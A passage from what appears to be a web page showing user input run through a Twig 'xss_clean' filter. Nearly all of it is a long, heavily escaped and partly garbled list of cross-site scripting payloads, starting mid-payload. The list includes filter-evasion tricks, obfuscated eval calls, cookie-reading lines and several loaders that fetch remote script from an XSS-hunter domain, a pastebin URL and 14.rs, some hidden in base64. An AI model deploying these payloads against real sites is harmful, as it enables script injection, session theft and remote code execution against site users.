=(1)&gt;\\r\\n\\\&quot;\\\&#039;`&gt;&lt;\\\\x00img src=xxx:x =(1)&gt;\\r\\n&lt;script src=\\\&quot;%(base64)s\\\&quot;&gt;\\r\\n&lt;embed src=\\\&quot;%(base64)s\\\&quot;&gt;\\r\\n&lt;b alert&#40;1&#41;0\\r\\n&lt;div id=\\\&quot;div1\\\&quot;&gt;&lt;input value=\\\&quot;``=(1)\\\&quot;&gt;&lt;/div&gt; &lt;div id=\\\&quot;div2\\\&quot;&gt;&lt;/div&gt;document.getElementById(\\\&quot;div2\\\&quot;) = document.getElementById(\\\&quot;div1\\\&quot;);\\r\\n&lt;x \\\&#039;=\\\&quot;foo\\\&quot;&gt;&lt;x foo=\\\&#039;&gt;&lt;img src=x =(1)//\\\&#039;&gt;\\r\\n&lt;embed src=\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;image src=\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;script src=\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;div style=width:1px;filter:glow =(1)&gt;x\\r\\n&lt;? foo=\\\&quot;&gt;(1)\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;&gt;(1)\\\&quot;&gt;\\r\\n&lt;/ foo=\\\&quot;&gt;(1)\\\&quot;&gt;\\r\\n&lt;? foo=\\\&quot;&gt;&lt;x foo=\\\&#039;?&gt;(1)\\\&#039;&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;[[[Inception]]\\\&quot;&gt;&lt;x foo=\\\&quot;]foo&gt;(1)\\\&quot;&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\&quot;%&gt;(1)\\\&quot;&gt;\\r\\n&lt;div id=d&gt;&lt;x xmlns=\\\&quot;&gt;&lt;iframe =(1)\\\&quot;&gt;&lt;/div&gt; d=d\\r\\n&lt;img \\\\x00src=x =\\\&quot;alert&#40;1&#41;\\\&quot;&gt;\\r\\n&lt;img \\\\x47src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x11src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x12src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x47src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x10src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x13src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x32src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x47src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img\\\\x11src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x47src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x34src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x39src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img \\\\x00src=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x09=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x10=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x13=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x32=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x12=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x11=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x00=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src\\\\x47=x =\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x09=\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x10=\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x11=\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x12=\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src=x\\\\x13=\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img[a][b][c]src[d]=x[e]=[f]\\\&quot;alert&#40;1&#41;\\\&quot;&gt;\\r\\n&lt;img src=x =\\\\x09\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src=x =\\\\x10\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src=x =\\\\x11\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src=x =\\\\x12\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src=x =\\\\x32\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;img src=x =\\\\x00\\\&quot;(1)\\\&quot;&gt;\\r\\n&lt;a href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:(1)&gt;XXX&lt;/a&gt;\\r\\n&lt;img src=\\\&quot;x` `(1)\\\&quot;` `&gt;\\r\\n&lt;img src /\\\&quot; \\\&#039;\\\&quot;= alt=(1)//\\\&quot;&gt;\\r\\n&lt;title =(1)&gt;&lt;/title&gt;&lt;title title=&gt;\\r\\n&lt;a href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt=\\\&quot;`&gt;&lt;img src=x:x =(1)&gt;&lt;/a&gt;\\\&quot;&gt;\\r\\n&lt;!--[if]&gt;(1)&lt;/script --&gt;\\r\\n&lt;!--[if&lt;img src=x =(1)//]&gt; --&gt;\\r\\n&lt;script src=\\\&quot;/\\\\%(jscript)s\\\&quot;&gt;\\r\\n&lt;script src=\\\&quot;\\\\\\\\%(jscript)s\\\&quot;&gt;\\r\\n&lt;object id=\\\&quot;x\\\&quot; classid=\\\&quot;clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\\\&quot;&gt;&lt;/object&gt; &lt;object classid=\\\&quot;clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\\\&quot; =\\\&quot;(1)\\\&quot; style=\\\&quot;(#x);\\\&quot;&gt;&lt;param name=postdomevents /&gt;&lt;/object&gt;\\r\\n&lt;a style=\\\&quot;-o-link:\\\&#039;(1)\\\&#039;;-o-link-source:current\\\&quot;&gt;X\\r\\n&lt;style&gt;p[foo=bar{}*{-o-link:\\\&#039;(1)\\\&#039;}{}*{-o-link-source:current}]{color:red};&lt;/style&gt;\\r\\n&lt;link rel=stylesheet href=data:,*%7bx:(1))%7d\\r\\n&lt;style&gt;@import \\\&quot;data:,*%7bx:(1))%7D\\\&quot;;&lt;/style&gt;\\r\\n&lt;a style=\\\&quot;pointer-events:none;position:absolute;\\\&quot;&gt;&lt;a style=\\\&quot;position:absolute;\\\&quot; =\\\&quot;(1);\\\&quot;&gt;XXX&lt;/a&gt;&lt;/a&gt;&lt;a href=\\\&quot;(1)\\\&quot;&gt;XXX&lt;/a&gt;\\r\\n&lt;style&gt;*[{}@import\\\&#039;%(css)s?]&lt;/style&gt;X\\r\\n&lt;div style=\\\&quot;font-family:\\\&#039;foo&amp;#10;;color:red;\\\&#039;;\\\&quot;&gt;XXX\\r\\n&lt;div style=\\\&quot;font-family:foo}color=red;\\\&quot;&gt;XXX\\r\\n&lt;// style=x:expression\\\\28(1)\\\\29&gt;\\r\\n&lt;style&gt;*{x:expression((1))}&lt;/style&gt;\\r\\n&lt;div style=content:url(%(svg)s)&gt;&lt;/div&gt;\\r\\n&lt;div style=\\\&quot;list-style:url(http://foo.f)\\\\20url((1));\\\&quot;&gt;X\\r\\n&lt;div id=d&gt;&lt;div style=\\\&quot;font-family:\\\&#039;sans\\\\27\\\\3B color\\\\3Ared\\\\3B\\\&#039;\\\&quot;&gt;X&lt;/div&gt;&lt;/div&gt; with(document.getElementById(\\\&quot;d\\\&quot;))innerHTML=innerHTML\\r\\n&lt;div style=\\\&quot;background:url(/f#&amp;#127;oo/;color:red/*/foo.jpg);\\\&quot;&gt;X\\r\\n&lt;div style=\\\&quot;font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\\\&quot;&gt;X\\r\\n&lt;div id=\\\&quot;x\\\&quot;&gt;XXX&lt;/div&gt; &lt;style&gt; #x{font-family:foo[bar;color:green;} #y];color:red;{} &lt;/style&gt;\\r\\n&lt;x style=\\\&quot;background:url(\\\&#039;x&amp;#1;;color:red;/*\\\&#039;)\\\&quot;&gt;XXX&lt;/x&gt;\\r\\n({set/**/$($){_/**/setter=$,_=(1)}}).$=eval\\r\\n({0:#0=eval/#0#/#0#((1))})\\r\\nReferenceError.prototype.__defineGetter__(\\\&#039;name\\\&#039;, function(){(1)}),x\\r\\nObject.__noSuchMethod__ = Function,[{}][0].constructor._(\\\&#039;(1)\\\&#039;)()\\r\\n&lt;meta charset=\\\&quot;x-imap4-modified-utf7\\\&quot;&gt;&amp;ADz&amp;AGn&amp;AG0&amp;AEf&amp;ACA&amp;AHM&amp;AHI&amp;AGO&amp;AD0&amp;AGn&amp;ACA&amp;AG8Abg&amp;AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&amp;ACAAPABi\\r\\n&lt;meta charset=\\\&quot;x-imap4-modified-utf7\\\&quot;&gt;&amp;&lt;script&amp;S1&amp;TS&amp;1&gt;alert&amp;A7&amp;(1)&amp;R&amp;UA;&amp;&amp;&lt;&amp;A9&amp;11/script&amp;X&amp;&gt;\\r\\n&lt;meta charset=\\\&quot;mac-farsi\\\&quot;&gt;%(payload)s;\\r\\n&lt;form id=\\\"test\\\" /&gt;&lt;button form=\\\"test\\\" formaction=\\\"(1)\\\"&gt;X\\r\\n&lt;body =(1)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;P STYLE=\\\"(\\\'#default#time2\\\')\\\" end=\\\"0\\\" =\\\"(1)\\\"&gt;\\r\\n&lt;STYLE&gt;@import\\\'%(css)s\\\';&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;a{background:url(\\\'s1\\\' \\\'s2)}@import (1);\\\');}&lt;/STYLE&gt;\\r\\n&lt;meta charset= \\\"x-imap4-modified-utf7\\\"&&&gt;&&&lt;script&&&gt;(1)&&;&&&lt;&&/script&&&gt;\\r\\n&lt;SCRIPT =(1);&gt;\\r\\n&lt;style =(1);&gt;&lt;/style&gt;\\r\\n&lt;?xml version=\\\"1.0\\\"?&gt;&lt;html:html xmlns:html=\\\'http://www.w3.org/1999/xhtml\\\'&gt;&lt;html:script&gt;(1);&lt;/html:script&gt;&lt;/html:html&gt;\\r\\n&lt;embed code=%(scriptlet)s&gt;&lt;/embed&gt;\\r\\n&lt;embed code=(1);&gt;&lt;/embed&gt;\\r\\n&lt;embed src=%(jscript)s&gt;&lt;/embed&gt;\\r\\n&lt;frameset =(1)&gt;&lt;/frameset&gt;\\r\\n&lt;object =(1)&gt;\\r\\n&lt;embed type=\\\"image\\\" src=%(scriptlet)s&gt;&lt;/embed&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=\\\"javas]]&lt;![CDATA[cript:(1);\\\"&gt;]]&lt;/C&gt;&lt;X&gt;&lt;/xml&gt;\\r\\n&lt;IMG SRC=&{(1);};&gt;\\r\\n&lt;a href=\\\"javAascript:(1)\\\"&gt;test1&lt;/a&gt;\\r\\n&lt;a href=\\\"javaascript:(1)\\\"&gt;test1&lt;/a&gt;\\r\\n&lt;embed width=500 height=500 code=\\\"data:text/html,%(payload)s\\\"&gt;&lt;/embed&gt;\\r\\n&lt;iframe srcdoc=\\\"&lt;iframe/srcdoc=<img/src=''>&gt;\\\"&gt;\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";\\r\\nalert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--\\r\\n&gt;\\\"&gt;\\\'&gt;alert&#40;String.fromCharCode(88,83,83&#41;)</p> <p>by z | at 2021-08-19 09:42:09</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">: \\\\\\\');confirm&#40;1&#41;;//\\r\\n<x/ \\r\\n\\r\\n \\r\\n \\r\\n\\r\\n \\r\\n \\r\\n \\r\\n \\r\\n&lt;link/rel=prefetch import href=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg&gt;\\r\\n&lt;link rel=\\\"import\\\" href=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\'&gt;&lt;/object>\\r\\n&lt;svg \\\\r\\\\n=$.globalEval&#40;\\\"al\\\"+\\\"ert(&#41;\\\");&gt;\\r\\n?\\\">&lt;base c==href=https:\\\\mysite&gt;\\r\\n<dETAILS open x>\\r\\n<a >\\r\\n<Img >\\x="&gt;"</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">: \\\\\\\&#039;);confirm(1);//\\r\\n&lt;x/onmouSeenter=window[`\\\\x61\\\\x6c\\\\x65\\\\x72\\\\x74`]`1337`\\r\\n&lt;script&gt;prompt(1)&lt;/script&gt; \\r\\n&lt;script&gt;confirm(1)&lt;/script&gt;\\r\\n&lt;script&gt;var fn=window[490837..toString(1&lt;&lt;5)]; fn(atob(\\\&#039;YWxlcnQoMSk=\\\&#039;));&lt;/script&gt; \\r\\n&lt;script&gt;var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob(\\\&#039;YWxlcnQoMSk=\\\&#039;));&lt;/script&gt; \\r\\n&lt;script&gt;var fn=window[atob(\\\&#039;ZXZhbA==\\\&#039;)];fn(atob(\\\&#039;YWxlcnQoMSk=\\\&#039;)); &lt;/script&gt;\\r\\n&lt;script&gt;window[490837..toString(1&lt;&lt;5)](atob(\\\&#039;YWxlcnQoMSk=\\\&#039;))&lt;/script&gt; &lt;script&gt;this[490837..toString(1&lt;&lt;5)](atob(\\\&#039;YWxlcnQoMSk=\\\&#039;))&lt;/script&gt; &lt;script&gt;this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])&lt;/script&gt; &lt;script&gt;this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))&lt;/script&gt; \\r\\n&lt;script&gt;\\\&#039;str1ng\\\&#039;.replace(/1/,alert)&lt;/script&gt; &lt;script&gt;\\\&#039;bbbalert(1)cccc\\\&#039;.replace(/a\\\\w{4}\\\\(\\\\d\\\\)/,eval)&lt;/script&gt; &lt;script&gt;\\\&#039;a1l2e3r4t6\\\&#039;.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })&lt;/script&gt; \\r\\n&lt;script&gt;eval(\\\&#039;\\\\\\\\u\\\&#039;+\\\&#039;0061\\\&#039;+\\\&#039;lert(1)\\\&#039;)&lt;/script&gt; &lt;script&gt;throw~delete~typeof~prompt(1)&lt;/script&gt; &lt;script&gt;delete[a=alert]/prompt a(1)&lt;/script&gt; &lt;script&gt;delete[a=this[atob(\\\&#039;YWxlcnQ=\\\&#039;)]]/prompt a(1)&lt;/script&gt; &lt;script&gt;(()=&gt;{return this})().alert(1)&lt;/script&gt; \\r\\n&lt;script&gt;new function(){new.target.constructor(\\\&#039;alert(1)\\\&#039;)();}&lt;/script&gt; &lt;script&gt;Reflect.construct(function(){new.target.constructor(\\\&#039;alert(1)\\\&#039;)()},[])&lt;/script&gt; \\r\\n&lt;link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg&gt;\\r\\n&lt;link rel=\\\&quot;import\\\&quot; href=\\\&quot;data:x,&lt;script&gt;alert(1)&lt;/script&gt; &lt;script&gt;Array.from1${alert}3${window}2&lt;/script&gt; \\r\\n&lt;script&gt;!{x(){alert(1)}}.x()&lt;/script&gt; &lt;script&gt;Array.from${eval}alert\\\\1\\\\``&lt;/script&gt; &lt;script&gt;Array.from([1],alert)&lt;/script&gt; &lt;script&gt;Promise.reject(\\\&quot;1\\\&quot;).then(null,alert)&lt;/script&gt; \\r\\n&lt;svg &lt;/onload =\\\&quot;1&gt; (_=alert,_(1)) \\\&quot;\\\&quot;&gt; \\r\\njavascript:/*--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;/xmp&gt;&lt;svg/onload=\\\&#039;+/\\\&quot;/+/onmouseover=1/+/[*/[]/+alert(1)//\\\&#039;&gt; \\r\\n&lt;marquee loop=1 width=0 onfinish=alert(1)&gt;\\r\\n&lt;p onbeforescriptexecute=\\\&quot;alert(1)\\\&quot;&gt;&lt;svg&gt;&lt;script&gt;\\\\&lt;/p&gt; \\r\\n&lt;img onerror=alert(1) src &lt;u&gt;&lt;/u&gt; &lt;videogt;&lt;source onerror=javascript:prompt(911)gt; \\r\\n&lt;base target=\\\&quot;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;&lt;a href=\\\&quot;javascript:name\\\&quot;&gt;CLICK&lt;/a&gt; \\r\\n&lt;base href=\\\&quot;javascript:/\\\&quot;&gt;&lt;a href=\\\&quot;**/alert(1)\\\&quot;&gt;&lt;base href=\\\&quot;javascript:/\\\&quot;&gt;&lt;a href=\\\&quot;**/alert(1)\\\&quot;&gt; \\r\\n&lt;style&gt;@KeyFrames x{&lt;/style&gt;&lt;div style=animation-name:x onanimationstart=alert(1)&gt; &lt; \\r\\n&lt;script&gt;\\r\\n${``[class extends[alert``]{}]}\\r\\n&lt;/script&gt; &lt;script&gt;[class extends[alert``]{}]&lt;/script&gt; \\r\\n&lt;script&gt;throw new class extends Function{}(\\\&#039;alert(1)\\\&#039;)``&lt;/script&gt; &lt;script&gt;x=new class extends Function{}(\\\&#039;alert(1)\\\&#039;); x=new x;&lt;/script&gt; &lt;script&gt;new class extends alert(1){}&lt;/script&gt; \\r\\n&lt;script&gt;new class extends class extends class extends class extends alert(1){}{}{}{}&lt;/script&gt; \\r\\n&lt;script&gt;new Image()[unescape(\\\&#039;%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74\\\&#039;)][atob(\\\&#039;ZGVmYXVsdFZpZXc=\\\&#039;)][8680439..toString(30)](1)&lt;/script&gt; &lt;script src=data:,\\\\u006fnerror=\\\\u0061lert(1)&gt;&lt;/script&gt; \\r\\n\\\&quot;&gt;&lt;svg&gt;&lt;script/xlink:href=\\\&quot;data:,alert(1) &lt;svg&gt;&lt;script/xlink:href=data:,alert(1)&gt;&lt;/script&gt; &lt;frameset/onpageshow=alert(1)&gt; \\r\\n&lt;div onactivate=alert(\\\&#039;Xss\\\&#039;) id=xss style=overflow:scroll&gt; \\r\\n&lt;div onfocus=alert(\\\&#039;xx\\\&#039;) id=xss style=display:table&gt;\\r\\n\\\&quot;&gt;&lt;script src=https://hackeroneofjaaah.xss.ht&gt;&lt;/script&gt;\\r\\njavascript:eval(\\\&#039;var a=document.createElement(\\\\\\\&#039;script\\\\\\\&#039;);a.src=\\\\\\\&#039;https://hackeroneofjaaah.xss.ht\\\\\\\&#039;;document.body.appendChild(a)\\\&#039;)\\r\\n\\\&quot;&gt;&lt;input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2Vyb25lb2ZqYWFhaC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus&gt;\\r\\n\\\&quot;&gt;&lt;img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2Vyb25lb2ZqYWFhaC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))&gt;\\r\\n\\\&quot;&gt;&lt;iframe srcdoc=\\\&quot;&amp;#60;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#62;&amp;#118;&amp;#97;&amp;#114;&amp;#32;&amp;#97;&amp;#61;&amp;#112;&amp;#97;&amp;#114;&amp;#101;&amp;#110;&amp;#116;&amp;#46;&amp;#100;&amp;#111;&amp;#99;&amp;#117;&amp;#109;&amp;#101;&amp;#110;&amp;#116;&amp;#46;&amp;#99;&amp;#114;&amp;#101;&amp;#97;&amp;#116;&amp;#101;&amp;#69;&amp;#108;&amp;#101;&amp;#109;&amp;#101;&amp;#110;&amp;#116;&amp;#40;&amp;#34;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#34;&amp;#41;&amp;#59;&amp;#97;&amp;#46;&amp;#115;&amp;#114;&amp;#99;&amp;#61;&amp;#34;&amp;#104;&amp;#116;&amp;#116;&amp;#112;&amp;#115;&amp;#58;&amp;#47;&amp;#47;hackeroneofjaaah.xss.ht&amp;#34;&amp;#59;&amp;#112;&amp;#97;&amp;#114;&amp;#101;&amp;#110;&amp;#116;&amp;#46;&amp;#100;&amp;#111;&amp;#99;&amp;#117;&amp;#109;&amp;#101;&amp;#110;&amp;#116;&amp;#46;&amp;#98;&amp;#111;&amp;#100;&amp;#121;&amp;#46;&amp;#97;&amp;#112;&amp;#112;&amp;#101;&amp;#110;&amp;#100;&amp;#67;&amp;#104;&amp;#105;&amp;#108;&amp;#100;&amp;#40;&amp;#97;&amp;#41;&amp;#59;&amp;#60;&amp;#47;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#62;\\\&quot;&gt;\\r\\n&lt;script&gt;function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\\\&quot;load\\\&quot;, b);a.open(\\\&quot;GET\\\&quot;, \\\&quot;//hackeroneofjaaah.xss.ht\\\&quot;);a.send();&lt;/script&gt;\\r\\n&lt;script&gt;$.getScript(\\\&quot;//hackeroneofjaaah.xss.ht\\\&quot;)&lt;/script&gt;\\r\\n&gt;&lt;object+data=//14.rs&gt;\\r\\n&gt;&lt;script src=//pastebin.com/raw/WDWWYaLA&gt;&lt;/script&gt;\\r\\n&lt;img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)&gt;\\r\\n&lt;/script&gt;&lt;svg&gt;&lt;script&gt;alert(1)-%26apos%3B\\r\\nanythinglr00&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;uxldz\\r\\nanythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz\\r\\n&lt;object data=\\\&#039;data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&#039;&gt;&lt;/object&gt;\\r\\n&lt;svg onload\\\\r\\\\n=$.globalEval(\\\&quot;al\\\&quot;+\\\&quot;ert()\\\&quot;);&gt;\\r\\n?\\\&quot;&gt;&lt;/script&gt;&lt;base%20c%3D=href%3Dhttps:\\\\mysite&gt;\\r\\n&lt;dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x&gt;\\r\\n&lt;a href=javas&amp;#99;ript:alert(1)&gt;\\r\\n&lt;Img src = x onerror = \\\&quot;javascript: window.onerror = alert; throw XSS\\\&quot;&gt;\\r\\n&lt;Video&gt; &lt;source onerror = \\\&quot;javascript: alert (XSS)\\\&quot;&gt;\\r\\n&lt;Input value = \\\&quot;XSS\\\&quot; type = text&gt;\\r\\n&lt;applet code=\\\&quot;javascript:confirm(document.cookie);\\\&quot;&gt;\\r\\n&lt;isindex x=\\\&quot;javascript:\\\&quot; onmouseover=\\\&quot;alert(XSS)\\\&quot;&gt;\\r\\n\\\&quot;&gt;&lt;/SCRIPT&gt;”&gt;’&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n\\\&quot;&gt;&lt;img src=\\\&quot;x:x\\\&quot; onerror=\\\&quot;alert(XSS)\\\&quot;&gt;\\r\\n\\\&quot;&gt;&lt;iframe src=\\\&quot;javascript:alert(XSS)\\\&quot;&gt;\\r\\n&lt;object data=\\\&quot;javascript:alert(XSS)\\\&quot;&gt;\\r\\n&lt;isindex type=image src=1 onerror=alert(XSS)&gt;\\r\\n&lt;img src=x:alert(alt) onerror=eval(src) alt=0&gt;\\r\\n&lt;img src=\\\&quot;x:gif\\\&quot; onerror=\\\&quot;window[\\\&#039;al\\\\u0065rt\\\&#039;](0)\\\&quot;&gt;&lt;/img&gt;\\r\\n&lt;iframe/src=\\\&quot;data:text/html,&lt;svg onload=alert(1)&gt;\\\&quot;&gt;\\r\\n&lt;meta content=\\\&quot;&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)\\\&quot; http-equiv=\\\&quot;refresh\\\&quot;/&gt;\\r\\n&lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open(\\\&#039;https://www.google.com/\\\&#039;)&gt;&lt;/script\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;url=javascript:confirm(1)\\\&quot;&gt;\\r\\n&lt;iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt;\\r\\n&lt;form&gt;&lt;a href=\\\&quot;javascript:\\\\u0061lert(1)\\\&quot;&gt;X\\r\\n&lt;/script&gt;&lt;img/*%00/src=\\\&quot;worksinchrome&amp;colon;prompt(1)\\\&quot;/%00*/onerror=\\\&#039;eval(src)\\\&#039;&gt;\\r\\n&lt;style&gt;//*{x:expression(alert(/xss/))}//&lt;style&gt;&lt;/style&gt;\\r\\nOn Mouse Over \\r\\n&lt;img src=\\\&quot;/\\\&quot; =_=\\\&quot; title=\\\&quot;onerror=\\\&#039;prompt(1)\\\&#039;\\\&quot;&gt;\\r\\n&lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script:&amp;#97lert(1)&gt;ClickMe\\r\\n&lt;script x&gt; alert(1) &lt;/script 1=2\\r\\n&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME\\r\\n&lt;input/onmouseover=\\\&quot;javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;\\\&quot;\\r\\n&lt;iframe src=\\\&quot;data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\\\&quot;&gt;&lt;/iframe&gt;\\r\\n&lt;OBJECT CLASSID=\\\&quot;clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\\\&quot;&gt;&lt;PARAM NAME=\\\&quot;DataURL\\\&quot; VALUE=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/OBJECT&gt;\\r\\n&lt;iframe srcdoc=\\\&quot;&amp;lt;svg/onload=alert()&amp;gt;\\\&quot;&gt;\\r\\n&lt;/script&gt;&lt;svg&gt;&lt;script&gt;alert(1)-%26apos%3B\\r\\nanythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz\\r\\n&lt;object data=\\\&#039;data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&#039;&gt;&lt;/object&gt;\\r\\n&lt;dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x&gt;\\r\\n&lt;a href=javas&amp;#99;ript:alert(1)&gt;\\r\\n\\r\\njavascript:alert(\\\&quot;OfJAAH\\\&quot;):\\r\\n&lt;style&gt;@keyframes 